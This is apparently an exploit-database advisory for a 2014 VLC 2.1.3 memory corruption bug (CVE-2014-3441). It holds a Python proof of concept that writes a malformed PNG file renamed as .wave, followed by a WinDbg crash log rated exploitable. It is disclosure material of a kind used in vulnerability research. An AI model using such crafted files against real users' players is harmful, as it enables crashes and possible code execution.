# Exploit Title: [VLCplayer memory corruption in latest Version 2.1.3 ] # Date: [2014/05/07] # Exploit Author: [Aryan Bayaninejad] # Linkedin : [https://www.linkedin.com/profile/view?id=276969082] # Vendor Homepage: [www.videolan.org] # Software Link: [ http://filehippo.com/download_vlc_32/download/b39c14a9f03cb9cf32eb01b1123b97bf/ ] # Version: [Version 2.1.3 and prior to that] # Tested on: [Windows Xp Sp 3 x86] # CVE : [2014-3441] details: VLCplayer latest version V 2.1.3 suffers from an memory corruption Vulnerability via a malformed .png file format when load codec\libpng_plugin.dll, you can change file extention to .wave Poc: #!/usr/bin/python data = "\x89\x50\x4E\x47\x0D\x0A\x1A\x0A\x00\x00\x00\x0D\x49\x48\x44\x52\x7F\xFF\xFF\xFF\x00\x00\x01\x02\x01\x03\x00\x00\x00\xBA\x1B\xD8\x84\x00\x00\x00\x03\x50\x4C\x54\x45\xFF\xFF\xFF\xA7\xC4\x1B\xC8\x00\x00\x00\x01\x74\x52\x4E\x53\x00\x40\xE6\xD8\x66\x00\x68\x92\x01\x49\x44\x41\x54\xFF\x05\x3A\x92\x65\x41\x71\x68\x42\x49\x45\x4E\x44\xAE\x42\x60\x82" outfile = file("poc.wave", 'wb') outfile.write(data) outfile.close() print "Created Poc" windbg result: Microsoft (R) Windows Debugger Version 6.2.9200.16384 X86 Copyright (c) Microsoft Corporation. All rights reserved. CommandLine: "C:\Program Files\VideoLAN\VLC\vlc.exe" Symbol search path is: *** Invalid *** **************************************************************************** * Symbol loading may be unreliable without a symbol search path. * * Use .symfix to have the debugger choose a symbol path. * * After setting your symbol path, use .reload to refresh symbol locations. * **************************************************************************** Executable search path is: ModLoad: 00400000 00426000 image00400000 ModLoad: 7c900000 7c9af000 ntdll.dll ModLoad: 7c800000 7c8f6000 C:\WINDOWS\system32\kernel32.dll ModLoad: 6a300000 6a324000 C:\Program Files\VideoLAN\VLC\libvlc.dll ModLoad: 6a540000 6a791000 C:\Program Files\VideoLAN\VLC\libvlccore.dll ModLoad: 77dd0000 77e6b000 C:\WINDOWS\system32\ADVAPI32.dll ModLoad: 77e70000 77f02000 C:\WINDOWS\system32\RPCRT4.dll ModLoad: 77fe0000 77ff1000 C:\WINDOWS\system32\Secur32.dll ModLoad: 77c10000 77c68000 C:\WINDOWS\system32\msvcrt.dll ModLoad: 7c9c0000 7d1d7000 C:\WINDOWS\system32\SHELL32.DLL ModLoad: 77f10000 77f59000 C:\WINDOWS\system32\GDI32.dll ModLoad: 7e410000 7e4a1000 C:\WINDOWS\system32\USER32.dll ModLoad: 77f60000 77fd6000 C:\WINDOWS\system32\SHLWAPI.dll ModLoad: 76b40000 76b6d000 C:\WINDOWS\system32\WINMM.DLL ModLoad: 71ab0000 71ac7000 C:\WINDOWS\system32\WS2_32.dll ModLoad: 71aa0000 71aa8000 C:\WINDOWS\system32\WS2HELP.dll ModLoad: 76bf0000 76bfb000 C:\WINDOWS\system32\PSAPI.DLL ModLoad: 771b0000 7725a000 C:\WINDOWS\system32\WININET.DLL ModLoad: 77a80000 77b15000 C:\WINDOWS\system32\CRYPT32.dll ModLoad: 77b20000 77b32000 C:\WINDOWS\system32\MSASN1.dll ModLoad: 77120000 771ab000 C:\WINDOWS\system32\OLEAUT32.dll ModLoad: 774e0000 7761d000 C:\WINDOWS\system32\ole32.dll (250.c1c): Break instruction exception - code 80000003 (first chance) *** ERROR: Symbol file could not be found. Defaulted to export symbols for ntdll.dll - eax=00351eb4 ebx=7ffde000 ecx=00000006 edx=00000040 esi=00351f48 edi=00351eb4 eip=7c90120e esp=0022fb20 ebp=0022fc94 iopl=0 nv up ei pl nz na po nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000202 ntdll!DbgBreakPoint: 7c90120e cc int 3 0:000> g ModLoad: 76390000 763ad000 C:\WINDOWS\system32\IMM32.DLL ModLoad: 629c0000 629c9000 C:\WINDOWS\system32\LPK.DLL ModLoad: 74d90000 74dfb000 C:\WINDOWS\system32\USP10.dll ModLoad: 773d0000 774d3000 C:\WINDOWS\WinSxS\x86_Microsoft.Windows.Common-Controls_6595b64144ccf1df_6.0.2600.5512_x-ww_35d4ce83\comctl32.dll ModLoad: 5ad70000 5ada8000 C:\WINDOWS\system32\uxtheme.dll ModLoad: 74720000 7476c000 C:\WINDOWS\system32\MSCTF.dll ModLoad: 77c00000 77c08000 C:\WINDOWS\system32\version.dll ModLoad: 755c0000 755ee000 C:\WINDOWS\system32\msctfime.ime ModLoad: 10000000 10008000 C:\Program Files\Internet Download Manager\idmmkb.dll ModLoad: 64fc0000 65008000 C:\Program Files\VideoLAN\VLC\plugins\access\libdshow_plugin.dll ModLoad: 6aac0000 6aacf000 C:\Program Files\VideoLAN\VLC\plugins\audio_output\libdirectsound_plugin.dll ModLoad: 6e980000 6e990000 C:\Program Files\VideoLAN\VLC\plugins\audio_output\libwaveout_plugin.dll ModLoad: 6a100000 6a119000 C:\Program Files\VideoLAN\VLC\plugins\video_output\libdirectdraw_plugin.dll ModLoad: 6c400000 6c5f6000 C:\Program Files\VideoLAN\VLC\plugins\access\liblibbluray_plugin.dll ModLoad: 68740000 68760000 C:\Program Files\VideoLAN\VLC\plugins\access\libaccess_bd_plugin.dll ModLoad: 6f440000 6f483000 C:\Program Files\VideoLAN\VLC\plugins\access\libdvdnav_plugin.dll ModLoad: 6b840000 6b85b000 C:\Program Files\VideoLAN\VLC\plugins\access\libaccess_vdr_plugin.dll ModLoad: 6f100000 6f114000 C:\Program Files\VideoLAN\VLC\plugins\access\libfilesystem_plugin.dll ModLoad: 68bc0000 68bd7000 C:\Program Files\VideoLAN\VLC\plugins\stream_filter\libsmooth_plugin.dll ModLoad: 64a00000 64a8b000 C:\Program Files\VideoLAN\VLC\plugins\stream_filter\libhttplive_plugin.dll ModLoad: 70680000 70736000 C:\Program Files\VideoLAN\VLC\plugins\stream_filter\libdash_plugin.dll ModLoad: 6ae40000 6ae64000 C:\Program Files\VideoLAN\VLC\plugins\access\libzip_plugin.dll ModLoad: 69e40000 69e52000 C:\Program Files\VideoLAN\VLC\plugins\access\libstream_filter_rar_plugin.dll ModLoad: 6d700000 6d70c000 C:\Program Files\VideoLAN\VLC\plugins\stream_filter\librecord_plugin.dll ModLoad: 70240000 70267000 C:\Program Files\VideoLAN\VLC\plugins\demux\libplaylist_plugin.dll ModLoad: 6cd00000 6ce7a000 C:\Program Files\VideoLAN\VLC\plugins\meta_engine\libtaglib_plugin.dll ModLoad: 66040000 66090000 C:\Program Files\VideoLAN\VLC\plugins\lua\liblua_plugin.dll ModLoad: 625c0000 626f9000 C:\Program Files\VideoLAN\VLC\plugins\misc\libxml_plugin.dll ModLoad: 73f10000 73f6c000 C:\WINDOWS\system32\DSOUND.DLL ModLoad: 77c00000 77c08000 C:\WINDOWS\system32\VERSION.dll ModLoad: 77920000 77a13000 C:\WINDOWS\system32\setupapi.dll ModLoad: 76c30000 76c5e000 C:\WINDOWS\system32\WINTRUST.dll ModLoad: 76c90000 76cb8000 C:\WINDOWS\system32\IMAGEHLP.dll ModLoad: 77920000 77a13000 C:\WINDOWS\system32\setupapi.dll ModLoad: 72d20000 72d29000 C:\WINDOWS\system32\wdmaud.drv ModLoad: 77920000 77a13000 C:\WINDOWS\system32\setupapi.dll ModLoad: 72d20000 72d29000 C:\WINDOWS\system32\wdmaud.drv ModLoad: 77920000 77a13000 C:\WINDOWS\system32\setupapi.dll ModLoad: 72d20000 72d29000 C:\WINDOWS\system32\wdmaud.drv ModLoad: 77920000 77a13000 C:\WINDOWS\system32\setupapi.dll ModLoad: 72d20000 72d29000 C:\WINDOWS\system32\wdmaud.drv ModLoad: 77920000 77a13000 C:\WINDOWS\system32\setupapi.dll ModLoad: 72d20000 72d29000 C:\WINDOWS\system32\wdmaud.drv ModLoad: 77920000 77a13000 C:\WINDOWS\system32\setupapi.dll ModLoad: 72d10000 72d18000 C:\WINDOWS\system32\msacm32.drv ModLoad: 77be0000 77bf5000 C:\WINDOWS\system32\MSACM32.dll ModLoad: 77bd0000 77bd7000 C:\WINDOWS\system32\midimap.dll ModLoad: 77920000 77a13000 C:\WINDOWS\system32\setupapi.dll ModLoad: 6ff40000 6ff55000 C:\Program Files\VideoLAN\VLC\plugins\control\libhotkeys_plugin.dll ModLoad: 6e180000 6e191000 C:\Program Files\VideoLAN\VLC\plugins\control\libglobalhotkeys_plugin.dll main libvlc: Running vlc with the default interface. Use 'cvlc' to use vlc without interface. ModLoad: 68e80000 6992e000 C:\Program Files\VideoLAN\VLC\plugins\gui\libqt4_plugin.dll ModLoad: 763b0000 763f9000 C:\WINDOWS\system32\COMDLG32.DLL ModLoad: 73000000 73026000 C:\WINDOWS\system32\WINSPOOL.DRV ModLoad: 71ad0000 71ad9000 C:\WINDOWS\system32\WSOCK32.DLL ModLoad: 769c0000 76a74000 C:\WINDOWS\system32\userenv.dll ModLoad: 01a20000 01ce5000 C:\WINDOWS\system32\xpsp2res.dll ModLoad: 5d090000 5d12a000 C:\WINDOWS\system32\comctl32.dll ModLoad: 76360000 76370000 C:\WINDOWS\system32\winsta.dll ModLoad: 5b860000 5b8b5000 C:\WINDOWS\system32\NETAPI32.dll ModLoad: 77920000 77a13000 C:\WINDOWS\system32\SETUPAPI.dll ModLoad: 6d6c0000 6d6f7000 C:\Program Files\VideoLAN\VLC\plugins\demux\libmp4_plugin.dll ModLoad: 6e040000 6e05e000 C:\Program Files\VideoLAN\VLC\plugins\demux\libavi_plugin.dll ModLoad: 68440000 68458000 C:\Program Files\VideoLAN\VLC\plugins\demux\libasf_plugin.dll ModLoad: 6c380000 6c39b000 C:\Program Files\VideoLAN\VLC\plugins\demux\libflacsys_plugin.dll ModLoad: 6ef40000 6ef4e000 C:\Program Files\VideoLAN\VLC\plugins\demux\libes_plugin.dll es demux error: cannot peek es demux error: cannot peek ModLoad: 011e0000 011fa000 C:\Program Files\VideoLAN\VLC\plugins\demux\libmpc_plugin.dll ModLoad: 6c2c0000 6c2cd000 C:\Program Files\VideoLAN\VLC\plugins\demux\libtta_plugin.dll ModLoad: 62380000 6238e000 C:\Program Files\VideoLAN\VLC\plugins\demux\libnuv_plugin.dll ModLoad: 67e00000 67e0d000 C:\Program Files\VideoLAN\VLC\plugins\demux\libwav_plugin.dll ModLoad: 03610000 036fc000 C:\Program Files\VideoLAN\VLC\plugins\demux\libsid_plugin.dll ModLoad: 6bf40000 6bf65000 C:\Program Files\VideoLAN\VLC\plugins\services_discovery\libsap_plugin.dll ModLoad: 6f8c0000 6f8eb000 C:\Program Files\VideoLAN\VLC\plugins\demux\libogg_plugin.dll ModLoad: 6a840000 6a96f000 C:\Program Files\VideoLAN\VLC\plugins\demux\libmkv_plugin.dll ModLoad: 70b00000 70b0c000 C:\Program Files\VideoLAN\VLC\plugins\demux\libdirac_plugin.dll ModLoad: 6d8c0000 6d97b000 C:\Program Files\VideoLAN\VLC\plugins\access\liblive555_plugin.dll ModLoad: 64740000 6474d000 C:\Program Files\VideoLAN\VLC\plugins\demux\libsmf_plugin.dll ModLoad: 6cbc0000 6cbcd000 C:\Program Files\VideoLAN\VLC\plugins\demux\libpva_plugin.dll ModLoad: 65300000 6530c000 C:\Program Files\VideoLAN\VLC\plugins\demux\libxa_plugin.dll ModLoad: 67500000 6750d000 C:\Program Files\VideoLAN\VLC\plugins\demux\libaiff_plugin.dll ModLoad: 6ce80000 6ce8d000 C:\Program Files\VideoLAN\VLC\plugins\demux\libvoc_plugin.dll ModLoad: 6fec0000 6fecc000 C:\Program Files\VideoLAN\VLC\plugins\demux\libau_plugin.dll ModLoad: 6b500000 6b56d000 C:\Program Files\VideoLAN\VLC\plugins\demux\libgme_plugin.dll ModLoad: 65280000 6528d000 C:\Program Files\VideoLAN\VLC\plugins\demux\librawvid_plugin.dll ModLoad: 6c940000 6c94e000 C:\Program Files\VideoLAN\VLC\plugins\demux\libimage_plugin.dll ModLoad: 683c0000 6840f000 C:\Program Files\VideoLAN\VLC\plugins\codec\libpng_plugin.dll (250.b14): Access violation - code c0000005 (first chance) First chance exceptions are reported before any exception handling. This exception may be expected and handled. *** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\WINDOWS\system32\msvcrt.dll - *** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\Program Files\VideoLAN\VLC\plugins\codec\libpng_plugin.dll - eax=00000000 ebx=018dee98 ecx=03ffe8c8 edx=00000000 esi=018ded80 edi=018e5000 eip=77c47631 esp=029ff940 ebp=029ff980 iopl=0 nv up ei pl nz na pe nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010206 msvcrt!memset+0x41: 77c47631 f3ab rep stos dword ptr es:[edi] 0:009> .load winext/msec.dll 0:009> !exploitable !exploitable 1.6.0.0 *** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\Program Files\VideoLAN\VLC\libvlccore.dll - *** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\Program Files\VideoLAN\VLC\plugins\demux\libimage_plugin.dll - Exploitability Classification: EXPLOITABLE Recommended Bug Title: Exploitable - User Mode Write AV starting at msvcrt!memset+0x0000000000000041 (Hash=0xefdbe58f.0x255f6419) User mode write access violations that are not near NULL are exploitable.